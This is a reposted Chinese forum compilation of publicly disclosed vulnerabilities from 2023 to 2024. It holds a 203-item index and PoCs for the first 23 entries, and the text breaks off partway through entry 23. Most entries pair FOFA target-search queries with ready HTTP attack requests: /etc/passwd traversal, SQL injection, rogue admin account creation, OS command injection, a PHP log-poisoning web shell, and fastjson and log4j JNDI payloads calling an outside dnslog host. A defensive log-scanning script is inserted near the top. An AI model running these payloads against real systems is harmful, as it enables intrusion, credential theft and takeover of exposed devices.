admin posted on 2024-6-5 14:31:29

Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)

Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article originally appeared on 网络安全新视界; author: 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive-defensive exercises; we hope this article helps with defence. Defenders can use its contents for risk checks.

Vulnerability sources: This article covers 203 PoCs for high-impact vulnerabilities disclosed domestically and abroad between September 2023 and May 2024. All come from other public accounts or websites on the Internet and were collected and published by the 网络安全新视界 team.

Security patches: All vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: Owing to space limits, a few PoCs that are too long are replaced uniformly by the word PAYLOAD; search for the full PoC yourself if needed.

Legal rights: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team via the backend to have it removed.


Notice

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the most complete version available; press F12 and search for keywords when using it.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).
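Added example, not part of the original article and not code from any vendor named in it: a Python script showing one way a defender can use the PoC request lines below for the risk check mentioned above. It normalises each request target in a web-server access log (repeated URL-decoding, stripping `;` suffixes, collapsing `..`) and matches the result against endpoint paths and payload fragments drawn from the entries. The log lines are constructed for the demo; the `keyword=<value>` form used for entry 9 is an assumption, since that request line is truncated on the page. Payloads carried only in a POST body (entries 17, 22, 25 and others) are not visible in access logs, so for those only the endpoint path is checked.

```python
"""Access-log triage for the request patterns catalogued in this article.

Added example, not part of the original article.  Indicator paths and payload
fragments are taken from the article's entries; the sample log lines are
constructed and come from no real system.
"""
import posixpath
import re
import urllib.parse
from typing import NamedTuple

# Endpoint paths taken from the article's entries (entry number in comment).
PATH_INDICATORS = {
    "starrocks-mem_tracker": "/mem_tracker",                            # 1
    "easycvr-userlist":      "/api/v1/userlist",                        # 3
    "easycvr-adduser":       "/api/v1/adduser",                         # 4
    "nuuo-debug-center":     "/__debugging_center_utils___.php",        # 5
    "sangfor-loadfile":      "/svpn_html/loadfile.php",                 # 6
    "jsherp-getalllist":     "/jshERP-boot/user/getAllList",            # 14, 15
    "dahua-readpic":         "/evo-apigw/evo-cirs/file/readPic",        # 20
    "dahua-is-exist":        "/evo-apigw/evo-brm/1.2.0/user/is-exist",  # 22
}

# Payload fragments that recur across many entries; matched against the
# decoded path and the decoded query string.
PAYLOAD_PATTERNS = {
    "sqli-time-based":  re.compile(r"waitfor\s+delay|dbms_pipe\.receive_message", re.I),
    "sqli-error-based": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "path-traversal":   re.compile(r"\.\.[/\\]"),
    "jndi-lookup":      re.compile(r"\$\{jndi:", re.I),
    "web-inf-access":   re.compile(r"/WEB-INF/", re.I),
    "sensitive-file":   re.compile(r"/etc/passwd|win\.ini", re.I),
}

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


class Target(NamedTuple):
    collapsed_path: str   # decoded, ';' suffixes removed, '..' collapsed
    decoded_path: str     # decoded only, traversal sequences still visible
    query: str            # decoded query string


def _decode_fully(s: str, plus: bool) -> str:
    """URL-decode until stable (max 3 rounds) so double encoding (entry 9) is undone."""
    for _ in range(3):
        nxt = urllib.parse.unquote_plus(s) if plus else urllib.parse.unquote(s)
        if nxt == s:
            break
        s = nxt
    return s


def normalise_target(target: str) -> Target:
    raw_path, _, raw_query = target.partition("?")
    decoded_path = _decode_fully(raw_path, plus=False)
    query = _decode_fully(raw_query, plus=True)
    # Strip ';...' matrix-parameter suffixes such as 'getAllList;.ico' (entry 14).
    stripped = "/".join(seg.split(";", 1)[0] for seg in decoded_path.split("/"))
    # Collapse '.' and '..' so '/static/../../etc/passwd' becomes '/etc/passwd'
    # and 'a.ico/../getAllList' (entry 15) becomes 'getAllList'.
    collapsed = posixpath.normpath(stripped)
    return Target(collapsed, decoded_path, query)


def scan_log_lines(lines):
    """Return one finding per log line that matches any indicator or pattern."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        t = normalise_target(m["target"])
        rules = [name for name, path in PATH_INDICATORS.items()
                 if t.collapsed_path == path or t.collapsed_path.startswith(path + "/")]
        rules += [name for name, pat in PAYLOAD_PATTERNS.items()
                  if pat.search(t.decoded_path) or pat.search(t.query)]
        if rules:
            findings.append({"line": lineno, "ip": m["ip"], "status": m["status"],
                             "path": t.collapsed_path, "rules": rules})
    return findings


# Constructed sample log lines (not real traffic), modelled on entries 2, 14, 26, 9 and 22.
_DOUBLE_ENCODED = urllib.parse.quote(urllib.parse.quote(
    "' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#", safe=""), safe="")
SAMPLE_LOG = [
    '203.0.113.10 - - [05/Jun/2024:07:41:00 +0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [05/Jun/2024:07:41:01 +0800] "GET /static/../../../../../../etc/passwd HTTP/1.1" 200 1024 "-" "curl/8.0"',
    '203.0.113.12 - - [05/Jun/2024:07:41:02 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.13 - - [05/Jun/2024:07:41:03 +0800] "GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1%27waitfor+delay+%270:0:5%27-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    # Assumption: the truncated entry-9 request carries the payload as keyword=<value>.
    f'203.0.113.14 - - [05/Jun/2024:07:41:04 +0800] "GET /search/index.php?keyword={_DOUBLE_ENCODED} HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '203.0.113.15 - - [05/Jun/2024:07:41:05 +0800] "POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} -> {f['path']} [{', '.join(f['rules'])}] status {f['status']}")
```

Matching on the collapsed path is what makes the `;.ico` suffix of entry 14, the `a.ico/../` detour of entry 15 and the long `../` chain of entry 2 all resolve to the same indicator; matching the payload patterns on the decoded but uncollapsed path is what still reports the traversal itself. A 200 status on a hit is the line worth looking at first.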



Contents

01

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 (Landray) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 (Dahua) DSS itcBulletin SQL injection
18. 大华 (Dahua) DSS digital surveillance system user_edit.action information disclosure
19. 大华 (Dahua) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 (Dahua) ICC intelligent IoT management platform arbitrary file read
21. 大华 (Dahua) ICC intelligent IoT management platform random remote code execution
22. 大华 (Dahua) ICC intelligent IoT management platform log4j remote code execution
23. 大华 (Dahua) ICC intelligent IoT management platform fastjson remote code execution
24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
25. 用友 NC registerServlet JNDI remote code execution
26. 用友 NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友 NC grouptemplet arbitrary file upload
29. 用友 NC down/bill SQL injection
30. 用友 NC importPml SQL injection
31. 用友 NC runStateServlet SQL injection
32. 用友 NC complainbilldetail SQL injection
33. 用友 NC downTax/download SQL injection
34. 用友 NC warningDetailInfo interface SQL injection
35. 用友 NC-Cloud importhttpscer arbitrary file upload
36. 用友 NC-Cloud soapFormat XXE
37. 用友 NC-Cloud IUpdateService XXE
38. 用友 U8 Cloud smartweb2.RPC.d XXE
39. 用友 U8 Cloud RegisterServlet SQL injection
40. 用友 U8-Cloud XChangeServlet XXE
41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 GRP-U8 SmartUpload01 file upload
43. 用友 GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 GRP-U8 ufgovbank XXE
46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 GRP A++Cloud government finance cloud arbitrary file read
48. 用友 U8 CRM swfupload arbitrary file upload
49. 用友 U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. 泛微 (Weaver) E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 (Chanjet) T+ getstorewarehousebystore remote code execution
55. 畅捷通 T+ getdecallusers information disclosure
56. 畅捷通 T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 T+ keyEdit.aspx SQL injection
58. 畅捷通 T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 (Seeyon) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese Tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 (Hikvision) operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin account creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达 (Glodon) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 PACS (medical image archiving and communication system) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视 management system dmku SQL injection
201. 方正 (Founder) all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthenticated access
FOFA:title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA:title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA:title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA:title="EasyCVR"

Set password to the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA:title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 (Sangfor) NGAF arbitrary file read
FOFA:title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA:body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. 斐讯 Phicomm router RCE
FOFA:icon_hash="-1344736688"
After logging in to the backend with the default account admin, perform the following operation
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA:app="Doccms"
GET /search/index.php?keyword
Host: x.x.x.x


The payload is the double URL-encoded form of the following statement

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA:icon_hash="953405444"

After the upload, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌 (Landray) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA:title="Jorani"
Step 1: obtain the cookie
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value in the response is used in the subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


POST request; the written function executes a base64-encoded command
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor



Send the following request to the target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. 红帆 iOffice ioFileDown arbitrary file read
FOFA:app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA:body="jshERP-boot"
The leaked content includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA:body="jshERP-boot"
The leaked content includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA:title="HFOffice"
The PoC calls a function that computes the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. 大华 (Dahua) DSS itcBulletin SQL injection
FOFA:app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>


18. 大华 (Dahua) DSS digital surveillance system user_edit.action information disclosure
FOFA:app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive



19. 大华 (Dahua) DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA:app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. 大华 (Dahua) ICC intelligent IoT management platform arbitrary file read
FOFA:body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. 大华 (Dahua) ICC intelligent IoT management platform random remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}


22. 大华 (Dahua) ICC intelligent IoT management platform log4j remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}



23. 大华 (Dahua) ICC intelligent IoT management platform fastjson remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
